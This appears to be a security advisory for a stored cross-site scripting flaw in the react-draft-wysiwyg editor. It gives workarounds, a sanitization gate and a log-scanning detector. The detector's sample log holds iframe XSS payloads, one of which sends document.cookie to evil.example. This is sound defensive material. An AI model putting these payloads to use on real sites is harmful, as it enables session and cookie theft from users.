CVE-2025-3191
📋 TL;DR
All versions of react-draft-wysiwyg are vulnerable to stored cross-site scripting (XSS) through the Embedded button. An attacker who can create or edit content inserts an iframe tag whose payload is saved with the content and executes in the browser of every user who later views it. Any React application that renders this editor's output is affected, along with the users of that application.
💻 Affected Systems
- react-draft-wysiwyg
⚠️ Manual Verification Required
The CVE record lists no affected version range, so automated, version-based detection cannot decide whether your installation is affected.
Why? The vendor and NVD entries do not specify which versions are vulnerable. Because no patched release exists, treat every installed version as affected until an advisory says otherwise.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Update to the latest version as a precaution and watch for a release that closes the issue; none has been published at the time of writing
⚠️ Risk & Real-World Impact
Worst Case
Attackers steal user session cookies, credentials, or sensitive data, perform actions as authenticated users, or redirect users to malicious sites.
Likely Case
Attackers inject malicious scripts that execute in users' browsers when viewing compromised content, potentially stealing session data or performing unauthorized actions.
If Mitigated
With server-side sanitization of stored HTML and a Content Security Policy on the pages that render it, the impact is minimal, though the editor component itself remains unpatched and the Embedded button still emits iframe markup unless disabled.
🎯 Exploit Status
Exploitation requires an attacker to have access to create or edit content using the vulnerable editor component. Public proof-of-concept demonstrates the vulnerability via iframe tag injection.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: None
Vendor Advisory: https://security.snyk.io/vuln/SNYK-JS-REACTDRAFTWYSIWYG-8515884
Restart Required: No
Instructions:
No official patch exists. Either replace the package with an alternative rich text editor or apply the workarounds below, and watch the package repository for a fixed release.
🔧 Temporary Workarounds
Disable Embedded Button
Remove or disable the Embedded button in the editor toolbar configuration so users cannot insert iframes through the UI.
In your editor configuration, remove 'embedded' from the toolbar options array (the options list of the Editor component's toolbar prop). This only removes the UI control; it does not reject iframe markup posted directly to your save endpoint, so pair it with sanitization.
Implement Content Sanitization
Add server-side and client-side sanitization of the editor's HTML, in particular stripping or encoding iframe tags before the content is stored and again before it is rendered.
Use libraries like DOMPurify to sanitize editor content before saving or rendering.
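The two workarounds above, as an added example that is not code from react-draft-wysiwyg or its maintainers: a helper that strips the Embedded button from the config passed to the Editor component's toolbar prop, and a server-side gate that refuses any submission still carrying an iframe tag. The default option list is an assumption taken from the package documentation and should be checked against the version you run; `hardenToolbar` and `checkSubmission` are illustrative names.

```javascript
// Added example (not react-draft-wysiwyg project code). Part 1 hardens the
// toolbar config; part 2 is a server-side rejection gate used as defence in
// depth behind a real sanitizer such as DOMPurify.

// Assumption: the package's default toolbar.options list. Confirm it against
// the version you have installed.
const DEFAULT_TOOLBAR_OPTIONS = [
  'inline', 'blockType', 'fontSize', 'fontFamily', 'list', 'textAlign',
  'colorPicker', 'link', 'embedded', 'emoji', 'image', 'remove', 'history',
];

// Returns a toolbar config with 'embedded' removed from `options` and any
// `embedded` sub-config dropped. Works with or without a caller-supplied
// list, so an app that never set `options` (and so got the defaults) is
// covered too.
function hardenToolbar(toolbar = {}) {
  const { embedded: _embedded, ...rest } = toolbar;
  const options = Array.isArray(rest.options) ? rest.options : DEFAULT_TOOLBAR_OPTIONS;
  return { ...rest, options: options.filter((name) => name !== 'embedded') };
}
// Usage in a component (JSX, not run here):
//   <Editor toolbar={hardenToolbar({ options: ['inline', 'link', 'embedded'] })} />

// True if the markup contains an <iframe> start tag in any case, including the
// self-closing (<iframe/src=...>) and attribute-less forms. This is a
// rejection test, not a sanitizer: it decides whether to persist at all and
// says nothing about other XSS payloads.
const IFRAME_TAG = /<iframe\b/i;
function containsIframe(html) {
  return IFRAME_TAG.test(String(html));
}

// Server-side gate for editor HTML before it is stored. Hypothetical shape:
// the HTTP handler maps `accepted === false` to a 400 response.
function checkSubmission(html) {
  if (containsIframe(html)) {
    return { accepted: false, reason: 'iframe tags are not permitted in editor content' };
  }
  return { accepted: true, reason: null };
}
```

The gate is deliberately blunt: a case-insensitive literal match is enough to refuse storage, but it is not a substitute for sanitizing on render. On both the save path and the render path call DOMPurify.sanitize(html, { FORBID_TAGS: ['iframe'] }) so the decision does not depend on a regex keeping pace with parser quirks, and serve the rendering pages with a CSP whose script-src omits 'unsafe-inline' so a javascript: frame source cannot execute even if one slips through.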
🧯 If You Can't Patch
- Serve the pages that render editor content with a strict Content Security Policy (CSP): a script-src without 'unsafe-inline' blocks javascript: frame sources, and frame-src limits where any iframe may load from.
- Use network segmentation to isolate vulnerable applications and limit potential impact scope.
🔍 How to Verify
Check if Vulnerable:
Check package.json and your lockfile (the package may be a transitive dependency) for react-draft-wysiwyg. If it is present in any version, the application is affected unless the workarounds above are in place.
Check Version:
npm list react-draft-wysiwyg
Verify Fix Applied:
Verify the workarounds by submitting an iframe tag, both through the editor and directly to the save endpoint, and confirming that it is rejected or stripped before storage and never executes when the content is rendered.
📡 Detection & Monitoring
Log Indicators:
- iframe tags in content submissions, especially with javascript: or data: URIs in the src attribute or with a srcdoc attribute
Network Indicators:
- Unexpected outbound connections from user browsers to external domains after viewing editor content
SIEM Query:
Search POST/PUT request bodies sent to content-save endpoints for the string '<iframe' (case-insensitive), and raise the priority of matches whose src uses a javascript: or data: URI.
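The log and SIEM indicators above, as an added detection example that is not vendor code: a pass over constructed request-log lines that flags POST/PUT bodies to editor endpoints containing iframe tags, scoring a javascript: or data: src or a srcdoc attribute as high and any other iframe as medium. The log schema (one JSON object per line with ts, method, path, src_ip and body fields), the endpoint paths and the sample entries are all assumptions.

```javascript
// Added detection example over constructed data. Log schema, endpoint list and
// sample lines are assumptions, not a real application's output.

// Assumption: endpoints that accept react-draft-wysiwyg output in a JSON `html` field.
const EDITOR_ENDPOINTS = [/^\/api\/posts(\/\d+)?$/, /^\/api\/comments(\/\d+)?$/];

// Constructed sample log, one JSON object per line, as an API gateway might emit.
const SAMPLE_LOG_LINES = [
  { ts: '2025-04-01T10:00:00Z', method: 'POST', path: '/api/posts', src_ip: '203.0.113.5',
    body: JSON.stringify({ html: '<p>Quarterly update</p>' }) },
  { ts: '2025-04-01T10:01:00Z', method: 'PUT', path: '/api/posts/42', src_ip: '203.0.113.9',
    body: JSON.stringify({ html: '<p>Demo</p><iframe src="https://www.youtube.com/embed/abc"></iframe>' }) },
  { ts: '2025-04-01T10:02:00Z', method: 'POST', path: '/api/comments', src_ip: '198.51.100.7',
    body: JSON.stringify({ html: '<p>hi</p><IFRAME SRC="javascript:alert(document.cookie)"></IFRAME>' }) },
  { ts: '2025-04-01T10:03:00Z', method: 'POST', path: '/api/comments', src_ip: '198.51.100.7',
    body: JSON.stringify({ html: "<iframe srcdoc='<script>fetch(\"https://evil.example/c?\"+document.cookie)</script>'></iframe>" }) },
  { ts: '2025-04-01T10:04:00Z', method: 'GET', path: '/api/posts/42', src_ip: '203.0.113.5', body: '' },
  { ts: '2025-04-01T10:05:00Z', method: 'POST', path: '/api/login', src_ip: '198.51.100.8',
    body: JSON.stringify({ user: '<iframe src="data:text/html,x">' }) },
].map((entry) => JSON.stringify(entry));

const IFRAME_TAG = /<iframe\b[^>]*>/gi;
const SRC_ATTR = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
const SRCDOC_ATTR = /\bsrcdoc\s*=/i;
const SCRIPT_SCHEME = /^\s*(?:javascript|data)\s*:/i;

// Severity for one iframe start tag: 'high' if it can run script directly
// (srcdoc, or a javascript:/data: src), otherwise 'medium' for triage.
function classifyIframe(tag) {
  if (SRCDOC_ATTR.test(tag)) return 'high';
  const m = SRC_ATTR.exec(tag);
  const src = m ? (m[1] ?? m[2] ?? m[3] ?? '') : '';
  return SCRIPT_SCHEME.test(src) ? 'high' : 'medium';
}

// Returns one finding per iframe found in a write request to an editor
// endpoint. Malformed lines and non-JSON bodies are handled, not fatal.
function scanRequestLogs(lines) {
  const findings = [];
  for (const line of lines) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; }
    if (!['POST', 'PUT'].includes(entry.method)) continue;
    if (!EDITOR_ENDPOINTS.some((re) => re.test(entry.path))) continue;
    let html;
    try { html = String(JSON.parse(entry.body).html ?? ''); } catch { html = String(entry.body ?? ''); }
    for (const m of html.matchAll(IFRAME_TAG)) {
      findings.push({ ts: entry.ts, src_ip: entry.src_ip, path: entry.path, severity: classifyIframe(m[0]), tag: m[0] });
    }
  }
  return findings;
}

// Example run: one JSON finding per line.
for (const f of scanRequestLogs(SAMPLE_LOG_LINES)) console.log(JSON.stringify(f));
```

On the sample data this yields three findings: the YouTube embed at medium, and the javascript: src and srcdoc entries at high; the GET and the /api/login write are out of scope. The regexes are a triage heuristic, not an HTML parser: a srcdoc payload containing '>' truncates the captured tag, and obfuscated schemes (control characters inside "javascript:", HTML entities) will score as medium rather than high. Widen EDITOR_ENDPOINTS to every route that stores rich text, and treat any medium finding from an endpoint where the Embedded button has been disabled as a direct-to-API submission worth investigating.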